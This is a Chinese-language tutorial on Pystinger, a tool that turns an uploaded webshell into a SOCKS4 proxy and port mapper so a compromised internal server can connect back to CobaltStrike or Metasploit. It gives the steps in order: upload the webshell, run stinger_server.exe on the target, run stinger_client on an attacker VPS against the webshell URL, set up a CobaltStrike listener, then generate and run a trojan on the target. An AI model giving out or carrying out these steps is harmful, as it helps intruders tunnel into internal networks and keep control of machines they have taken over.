【工具使用】Pystinger(毒刺)的使用

简介: 一款用于Webshell实现内网 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。

一、Pystinger介绍


一款用于Webshell实现内网 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。


二、项目地址


image.png

引用链接:https://mp.weixin.qq.com/s/45AKbRS677fxynKW6Qfz7w


三、Pystinger 原理图

image.png

四、实现主机上线CS


服务端配置

将 webshell 上传到目标web目录下,能成功访问则返回 UTF-8

image.png

image.png

然后将 stinger_server.exe 上传到目标服务器,执行以下命令


start stinger_server.exe 0.0.0.0

image.png

image.png

五、客户端配置


公网VPS


stinger_client 上传到VPS上,然后执行


./stinger_client -w http://X.X.X.X/proxy.php -l 0.0.0.0 -p 60000

image.png

此时已经在 VPS 的 60000 端口 启动了一个 socks4a 代理,并将 目标服务器的60020端口 映射到 VPS上的60020端口 上了。


CobaltStrike开启监听


这里的 HTTP Hosts 填目标机器内网ip,端口填RAT Config上的端口,默认为60020

image.png

生成一个木马,监听器使用我们刚刚创建的 asdm ,并在目标机器上运行,这是我们可以看到VPS有流量在交互,并且使主机上线!

image.png

image.png

成功上线CS。

目录
相关文章
|
10月前
|
缓存
Storcli工具使用方法(附管理工具)
Storcli工具使用方法(附管理工具)
1051 0
|
3月前
|
程序员
SourceCount代码统计工具使用
SourceCount代码统计工具使用
28 0
|
7月前
|
SQL OceanBase
obdumper` 工具
obdumper` 工具
131 1
|
10月前
|
监控 测试技术 Apache
测试工具介绍
ApacheBench、JMeter 和 Gatling 都是常用的性能测试工具,这里为您详细介绍这三个工具的操作流程。
113 0
|
程序员
FastStone|抓屏工具
FastStone|抓屏工具
272 0
An工具介绍之3D工具
An工具介绍之3D工具
377 0
An工具介绍之3D工具
|
安全 中间件 应用服务中间件
|
移动开发 数据可视化 前端开发
工具使用| 学习笔记
快速学习工具使用。
66 0
工具使用| 学习笔记
|
数据采集 SQL 关系型数据库
Kettle工具使用及总结
kettle主要用于数据清洗,即常见ETL工具,拥有图形化界面且免费的优点。
409 0
Kettle工具使用及总结
|
SQL 安全 Shell